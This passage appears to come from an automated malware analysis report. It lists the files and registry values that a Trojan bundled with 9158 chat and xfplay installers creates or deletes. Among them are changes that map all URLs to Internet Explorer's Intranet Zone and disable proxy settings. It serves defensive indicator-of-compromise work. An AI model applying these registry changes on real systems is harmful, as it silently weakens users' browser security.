%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\msvcr90.dll (4577 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\popwndexe.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsTray.ico (68 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rsdk.dll (3073 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\rspalvd.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmaindui\rsmain.exe (817 bytes)
%Program Files%\Rising\RSD\Backup\RAV\LICENSE\LICENSE.xml (347 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscfg\rscfg.xml (996 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\bawhite.dll (1069 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsutils_if.dll (58 bytes)
%Program Files%\Rising\RAV\NetConfig.ini (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\setup.dat (126 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\moncomm.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\rscurl.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RAV\LICENSE\12345678.000 (24 bytes)
%Program Files%\Rising\RSD\rsdinfo.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\cloudnotifier.dll (1425 bytes)
%Documents and Settings%\All Users\Application Data\Rising\RAV\language.ini (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsBackup.exe (1851 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\hookbase.dll (673 bytes)
%Program Files%\Rising\RSD\CfgDll.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\LogAc.bmp (24 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\rscommx2.dll (1281 bytes)
%Program Files%\Rising\RSD\RstoreDll.dll (1281 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\Repair.url (155 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAV936\RAV936.xml (515 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsAppMgr.dll (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.mondcoms (232 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\rsutils.sys (59 bytes)
%Program Files%\Rising\RSD\RsBackup.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravconfig\ravcfg.xml (126 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsAppMgr.dll (1235 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsSmall.bmp (576 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\install1393485.exe.log (123551 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\kguard_if.dll (1516 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\64\sysmon.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudwork.dll (11830 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\syslay.dll (26 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\cloudstore.dll (2321 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\MSCRT9.xml (961 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudqry.dll (3179 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\mondrv.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\rsuser.db1 (71 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\sysmon_if.dll (871 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVCONFIG\mergexml.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\repairmanager.dll (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsMain.ico (27 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\64\rsndisp.sys (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\rssrv.dll (114 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\RSCOMM.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk.dll (3245 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudqry.xml (1 bytes)
%Program Files%\Rising\RSD\localopt.dll (1425 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMAINDUI\RAVMAINDUI.xml (1 bytes)
%Program Files%\Rising\RSD\RSD936\CHS.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\rsuser.db1 (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\repairmanager.dll (38 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\setup.dat (118 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudstore.dll (2897 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\x64\adefmon.mond (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsndisp.sys (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\hookbase.dll (787 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\antipromotionmon.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\cloudqry.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\antipromotionmon.dll (432 bytes)
%Documents and Settings%\All Users\Application Data\Rising\RAV\RAV.ini (69 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\Proccom.dll (101 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\dataups.dat (207 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD950\CHT.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\rsxml3w.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\rscombas.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Auto.ini (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\mondef.dll (6282 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\selfmon.dll (89 bytes)
%Program Files%\Rising\RSD\Setup.exe (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rscom.dll (452 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\msvcp90.dll (4492 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RAV.ico (81 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\rssrv.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\cloudsta.dll (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\mondrv.dll (2829 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD1252\Eng.lag (52 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\cloudnet.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMON\mond.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\popwndexe.exe (126 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\ui\snin.htm (527 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RsMain.ico (27 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\localopt.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RAV.cfg.tmp (1960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rsxml3a.dll (966 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\rsnscfg.dat (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\rsxml3a.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\64\sysmon.sys (119 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\Proccom.dll (1281 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\sysmon_if.dll (64 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\MONBASEDUI.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsMgrSvc.exe (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\x64\adefmon.mond (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rav936\rav936.xml (515 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RSD932\Jpn.lag (37 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\mondef.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\RsSmall.bmp (576 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\kguard_if.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\cnt08.dll (1787 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\localopt.dll (1199 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\dfw.dll (3888 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\procenv.dll (29 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\ravdefdb.xml (967 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RsStub.exe (64 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\urg[1].htm (112 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\rsmon.db1 (43 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rsdk.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RstoreDll.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmon\mondcoms.xml (8 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\repairmanager.mond (207 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MONBASEDUI\ravmond.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\ravmond.exe (1990 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD936\CHS.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVCONFIG\ravcfg.xml (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\bawhite.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\Repair.url (155 bytes)
%Program Files%\Rising\RSD\rsdk.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\RsBaseNetWrapper.dll (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\uprsmon.dat (45 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdinfo.dll (2067 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\Proccomm.dll (2199 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCOMM\rssqlite.dll (2321 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\monrule.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsdll.dll.dat (101 bytes)
%Program Files%\Rising\RSD\syslay.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\_rav\setup.xml (2 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMAINDUI\rsmain.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\cloudsta.dll (63 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\Microsoft.VC90.ATL.manifest (466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\cnt09.dll (2293 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\kguard.sys (601 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rsmginfo.dll (2105 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\syslay.dll (601 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\HOOKBASE.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDQRY\CLOUDQRY.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\hookbase.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\Rising.ico (3 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\RAVDEFDB.xml (967 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\updater.exe (3361 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\uprsuser.dat (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\defmon.dll (3386 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVLOG\rslog.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudqry\rsnscfg.dat (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\traywnd.dll (76 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\rstask.xml (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\pngdll.dll (2332 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscfg\rscfg.dll (270 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsmondef\adefmon.mond (2 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RAV_DL (0 bytes)
%Program Files%\Rising\RAV (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RAV.cfg (0 bytes)
%Program Files%\Rising (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\irg[1].ashx (0 bytes)
%Program Files%\RsTest.ini (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Rav.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\c[1].aspx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\urg[1].htm (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\ErrorNet[1].htm (0 bytes)
The process 9158.exe:3012 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
The process xianfengupdate.exe:660 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\All Users\Application Data\tools\daohang_.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\taobao.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\ie6.ico (17 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\网址导航.lnk (1 bytes)
%Documents and Settings%\All Users\Application Data\tools\sougou_search.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\ie10.ico (2058 bytes)
%Program Files%\tools\tools.exe (2532 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\快捷导航\打折网购.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\nsTools.dll (8089 bytes)
%Documents and Settings%\%current user%\Favorites\全国最给力充值店-淘宝网.url (46 bytes)
%Documents and Settings%\All Users\Desktop\网址导航.lnk (1 bytes)
%Documents and Settings%\All Users\Application Data\tools\bdmanager.dll (544 bytes)
%Documents and Settings%\%current user%\Favorites\Links\全国最给力充值店-淘宝网.url (46 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\打折网购.lnk (1 bytes)
%Documents and Settings%\All Users\Desktop\打折网购.lnk (1 bytes)
%Documents and Settings%\All Users\Application Data\tools\ie8.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\daohang.ico (3165 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\快捷导航\网址导航.lnk (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (823 bytes)
%Documents and Settings%\%current user%\Desktop\Intrenet. Expleror.lnk (805 bytes)
The Trojan deletes the following file(s):
%Program Files%\tools\isWrite (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsv6.tmp\nsTools.dll (0 bytes)
The process %original file name%.exe:1736 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\xfplay\tools.exe (1530 bytes)
%Documents and Settings%\All Users\Application Data\tools\daohang_.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\taobao.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\ie6.ico (17 bytes)
%Program Files%\xfplay\bdupdate.exe (103612 bytes)
%Program Files%\xfplay\xianfengkunbang.exe (26550 bytes)
%Documents and Settings%\All Users\Application Data\tools\ie10.ico (2566 bytes)
%Documents and Settings%\All Users\Application Data\tools\sougou_search.ico (17 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp\System.dll (11 bytes)
%Program Files%\xfplay\xianfeng.exe (197071 bytes)
%Documents and Settings%\All Users\Application Data\tools\ie8.ico (17 bytes)
%Documents and Settings%\All Users\Application Data\tools\daohang.ico (3345 bytes)
%Program Files%\xfplay\xianfengupdate.exe (16294 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm2.tmp (0 bytes)
%Program Files%\xfplay\isWrite (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1.tmp (0 bytes)
Registry activity
The process 9158chat2_ktv088_63.exe:2116 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\9158Service]
"IsGuest" = "1"
[HKLM\SOFTWARE\9158web]
"StartTime" = "11070701"
[HKLM\SOFTWARE\9158Service]
"TopLevel" = "1"
"Open" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\9158web]
"MainRun" = "d:\Program Files\9158KTV\9158.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\9158Service]
"LastPlat" = "51"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\9158多人视频]
"DisplayVersion" = "6.940"
"DisplayName" = "9158多人视频"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\9158Service]
"PlatName" = "9158多人视频"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\MozillaPlugins\@9158.com/nplogin]
"Path" = "d:\Program Files\9158KTV\nplogin.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6F B0 73 C9 4C FA 32 79 A2 41 44 B1 71 CD D1 E0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\9158多人视频]
"UninstallString" = "d:\Program Files\9158KTV\Uninst.exe"
"Publisher" = "天格科技（杭州）有限公司"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\9158多人视频]
"URLInfoAbout" = "http://www.9158.com/"
The process sr.exe:244 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DA EA 78 7D 63 CE F0 13 1F C2 0F EA A3 C0 FB 44"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE security zone settings to map all local web-nodes with no dots that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE security zone settings to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process 9158IE.exe:3116 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6E B7 9E F5 94 82 B8 48 BB 6E 0E 52 D8 BA F0 0C"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE security zone settings to map all local web-nodes with no dots that are not assigned to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
